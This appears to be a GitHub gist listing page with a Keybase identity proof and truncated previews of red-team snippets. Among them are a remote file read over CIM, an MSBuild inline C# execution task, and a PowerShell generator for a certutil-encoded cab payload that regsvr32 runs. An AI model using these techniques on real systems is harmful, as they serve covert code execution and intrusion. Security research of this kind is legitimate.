I hereby claim:
- I am xorrior on github.
- I am xorrior (https://keybase.io/xorrior) on keybase.
- I have a public key whose fingerprint is A086 24A4 D702 0EAE FCEC 139D 56BA 7C93 A848 D2F7
To claim this, I am signing this object:
$CimSession = New-CimSession -ComputerName 10.0.0.2 | |
$FilePath = 'C:\Windows\System32\notepad.exe' | |
# PS_ModuleFile only implements GetInstance (versus EnumerateInstance) so this trick below will force a "Get" operation versus the default "Enumerate" operation. | |
$PSModuleFileClass = Get-CimClass -Namespace ROOT/Microsoft/Windows/Powershellv3 -ClassName PS_ModuleFile -CimSession $CimSession | |
$InMemoryModuleFileInstance = New-CimInstance -CimClass $PSModuleFileClass -Property @{ InstanceID= $FilePath } -ClientOnly | |
$FileContents = Get-CimInstance -InputObject $InMemoryModuleFileInstance -CimSession $CimSession | |
$FileLengthBytes = $FileContents.FileData[0..3] | |
[Array]::Reverse($FileLengthBytes) |
// | |
// Generated by class-dump 3.5 (64 bit). | |
// | |
// class-dump is Copyright (C) 1997-1998, 2000-2001, 2004-2013 by Steve Nygard. | |
// | |
#import "NSObject.h" | |
#import "SMSystem_FileManagerProtocol.h" | |
//<SMSystem_FileManagerProtocol> | |
@class NSObject, SMMigrationRequest; |
// | |
// demoClass.m | |
// testExampleBundle | |
// | |
// Created by Chris Ross on 4/17/18. | |
// Copyright © 2018 Void. All rights reserved. | |
// | |
#import <Foundation/Foundation.h> | |
#import <objc/objc.h> |
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> | |
<!-- This inline task executes c# code. --> | |
<!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe pshell.xml --> | |
<!-- Author: Casey Smith, Twitter: @subTee --> | |
<!-- License: BSD 3-Clause --> | |
<PropertyGroup> | |
<FunctionName Condition="'$(FunctionName)' == ''">None</FunctionName> | |
<Cmd Condition="'$(Cmd)' == ''">None</Cmd> | |
</PropertyGroup> | |
<Target Name="Hello"> |
<?xml version="1.0" encoding="UTF-8"?> | |
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"> | |
<plist version="1.0"> | |
<array> | |
<dict> | |
<key>name</key> | |
<string>sample rule</string> | |
<key>enabled</key> | |
<true/> | |
<key>eventTypes</key> |
function New-CplBatchFile | |
{ | |
<# | |
.SYNOPSIS | |
Generates a batch file which will contain a certutil encoded, cab compressed payload. | |
.DESCRIPTION | |
The batch file will decode and decompress the cab file, then execute the dll within with regsvr32. You may modify the bat file to execute whatever you want. | |
Create payload: |
# Author: Matthew Graeber (@mattifestation) | |
# Load dnlib with Add-Type first | |
# dnlib can be obtained here: https://github.com/0xd4d/dnlib | |
# Example: ls C:\ -Recurse | Get-AssemblyLoadReference | |
filter Get-AssemblyLoadReference { | |
param ( | |
[Parameter(Mandatory = $True, ValueFromPipelineByPropertyName = $True)] | |
[Alias('FullName')] | |
[String] | |
[ValidateNotNullOrEmpty()] |
I hereby claim:
To claim this, I am signing this object: